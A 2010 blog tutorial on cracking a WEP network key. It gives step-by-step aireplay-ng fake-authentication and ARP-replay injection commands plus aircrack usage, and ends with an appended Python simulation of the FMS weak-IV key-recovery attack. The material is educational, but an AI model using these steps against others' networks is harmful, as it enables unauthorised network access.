Monday, December 13, 2010

Cracking WEP - Step by step

This topic has come up a lot lately, and it seems many people still have doubts about it, so I will try to explain it properly.

What I will explain is how to recover the key of a wireless network, using a 64-bit WEP key as the example. I recommend reading up on how encryption works in wireless networks first, so you understand what is actually being attacked when such a network is cracked.

Note: the images have been edited to hide the MAC addresses and avoid problems.
Let's see how to obtain a wireless network's key; the example is based on attacking my own network.

Material used:
Live CD: Wifislax 2.0
Wireless card: Atheros chipset
RAM: 256 MB (enough)

The first thing to do once the live CD has booted is to put our wireless card into monitor mode. To do that, go to:

Menu > Wifislax > Support Chipset > Support Chipset Atheros > Create interface (Monitor Mode)

Next, run Kismet to find out which channel the target network is on, its MAC address and its encryption type.

Menu> Wifislax> Wireless Tools> Monitoring wireless (Kismet)

In the driver list I chose rt2500 and clicked apply.

When the Kismet screen appears, press a key and then press the letter "s" twice.



Press Enter on the target network:

and note down the data we need:

SSID, BSSID, channel and encryption:




In the image you can see that the SSID (network name) is Th3r0rn, that the BSSID is the access point's MAC address, that the network is on channel 6, and that the encryption type is WEP.

Once this data is noted down, press "Q" to go back and, with the target network still selected, press "C" to list the clients connected to it. Here we clearly see a machine connected to the network over wireless :-)


Now close the Kismet window and open a new shell. In this shell we run airodump, like this:

airodump ath0 th3r0rn 6

The syntax: airodump is the program, ath0 is our wireless interface, th3r0rn is the name of the output file it generates (in .cap or .ivs format; you can use any name you like), and 6 is the channel airodump will capture on, ignoring all other channels, since we saw in Kismet that the target network is on channel 6.

Now we need to associate with the network so that we can inject traffic. We use aireplay for this (fake authentication, attack -1); the syntax is:

aireplay-ng -1 0 -e ESSID -a BSSID -h STATION ath0

where -e is the network name, -a is the BSSID (the access point's MAC), -h STATION is the source MAC address of our station, and ath0 is our interface. So in our case we run:

aireplay-ng -1 0 -e Th3r0rn -a MAC -h STATION ath0

As a result, we see that the association with the network succeeds:



The next step is to speed up the traffic on the network by injecting packets with aireplay (ARP request replay, attack -3).

Its syntax is:

aireplay-ng -3 -b MAC -h STATION ath0

where -b MAC is again the BSSID of the access point, -h STATION is the same source MAC we associated with, and ath0 is our interface. Once it is running, just sit back and wait while it injects the traffic needed to obtain the WEP key :-)



Once we have captured more than 250,000 IVs (roughly what is needed to break 64-bit WEP with this method), we can run aircrack to get the key.

The syntax is:

aircrack file.cap

Observe that the target network has 303,404 IVs

and that its ID number is "1"



so we type 1 and press Enter,

and Bingooo!

We have the key!



In the image you can see that my aircrack shows 303,404 IVs and that two .cap files were used; this is because I had to stop the capture to do something else, and then captured again until I had what I needed.

Keep in mind that the amount of data you need to capture to get the network's key depends on the encryption in use; a 128-bit WEP key needs considerably more IVs than the 64-bit one shown here.
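Why so many IVs are needed: WEP encrypts every frame with RC4 keyed with IV || key, the 24-bit IV travels in the clear, and the first plaintext byte of every data frame is the known SNAP header byte 0xAA. The FMS attack (Fluhrer, Mantin and Shamir) that early aircrack versions used exploits "weak" IVs such as (A+3, 0xFF, X): for those, the first keystream byte leaks key byte A with probability of about 5%, so collecting enough of them lets a majority vote recover the key byte by byte. The following Python simulation is an added example, not code from the original post or from the aircrack project: it encrypts constructed frames under a made-up WEP-40 key, then recovers that key from the IVs and first ciphertext bytes alone, using FMS voting plus an aircrack-style "fudge factor" search over the runner-up candidates. The constructed capture contains only weak IVs, so it is tiny (1280 frames); in real traffic only a small fraction of IVs are weak, which is why the capture above needed hundreds of thousands of them.

```python
"""Why WEP falls to IV collection: a simulated FMS attack on a WEP-40 key.

Added example, not code from the original post or from aircrack. The key,
the IVs and the frame payload below are constructed for the demonstration.
"""
import zlib
from collections import Counter

SNAP_FIRST_BYTE = 0xAA  # every LLC/SNAP data frame starts with 0xAA 0xAA 0x03
KEY_LEN = 5             # WEP-40: 5 secret bytes + 24-bit IV = "64-bit WEP"


def rc4_ksa(key, rounds=256):
    """Run the first `rounds` steps of the RC4 key schedule; return (S, j)."""
    S = list(range(256))
    j = 0
    for i in range(rounds):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key, n):
    """Return the first n RC4 keystream bytes for `key`."""
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext):
    """WEP frame body: RC4(IV || key) XOR (plaintext || CRC32 ICV)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4_keystream(iv + key, len(plaintext) + 4)
    return iv, bytes(p ^ k for p, k in zip(plaintext + icv, ks))


def make_capture(key):
    """Constructed capture holding only the classic FMS weak IVs (A+3, 0xFF, X).

    Real traffic contains only a small fraction of such IVs, which is why a
    real attack needs hundreds of thousands of frames instead of 1280.
    """
    payload = bytes([SNAP_FIRST_BYTE, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00])
    return [wep_encrypt(key, bytes([a + 3, 0xFF, x]), payload)
            for a in range(KEY_LEN) for x in range(256)]


def fms_votes(capture, prefix):
    """Vote for key byte A = len(prefix), given the already recovered bytes.

    For each frame, run A+3 KSA steps with IV || prefix. If the state is
    'resolved' (S[1] < A+3 and S[1] + S[S[1]] == A+3), the first keystream
    byte equals the value swapped into S[A+3] by the next KSA step with
    probability about e^-3, giving key[A] = S^-1[ks0] - j - S[A+3].
    Wrong guesses spread roughly evenly over the other 255 values.
    """
    a = len(prefix)
    votes = Counter()
    for iv, body in capture:
        S, j = rc4_ksa(iv + prefix, a + 3)
        if S[1] >= a + 3 or S[1] + S[S[1]] != a + 3:
            continue  # this IV is not weak for key byte A
        ks0 = body[0] ^ SNAP_FIRST_BYTE  # first plaintext byte is known
        votes[(S.index(ks0) - j - S[a + 3]) & 0xFF] += 1
    return votes


def key_fits(key, capture, samples=4):
    """Check a full key candidate: it must decrypt the SNAP byte of a few frames."""
    return all(rc4_keystream(iv + key, 1)[0] ^ body[0] == SNAP_FIRST_BYTE
               for iv, body in capture[:samples])


def recover_key(capture, fudge=6, prefix=b""):
    """Depth-first search over the `fudge` best-voted candidates per byte.

    Trying the runners-up is the 'fudge factor' aircrack uses to tolerate
    key bytes whose correct value did not come out on top of the vote.
    """
    if len(prefix) == KEY_LEN:
        return prefix if key_fits(prefix, capture) else None
    for cand, _ in fms_votes(capture, prefix).most_common(fudge):
        found = recover_key(capture, fudge, prefix + bytes([cand]))
        if found is not None:
            return found
    return None


if __name__ == "__main__":
    secret = bytes.fromhex("0badc0ffee")  # constructed WEP-40 key
    capture = make_capture(secret)
    print("frames in capture:", len(capture))
    print("recovered key:", recover_key(capture).hex())
```

The attacker side (fms_votes, key_fits, recover_key) only ever reads the IV and the first ciphertext byte of each frame, which is exactly what airodump's .ivs files store. Longer keys just mean more key bytes to vote on, each needing its own supply of weak IVs, which is the reason 128-bit WEP takes more captured traffic than the 64-bit key cracked above.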
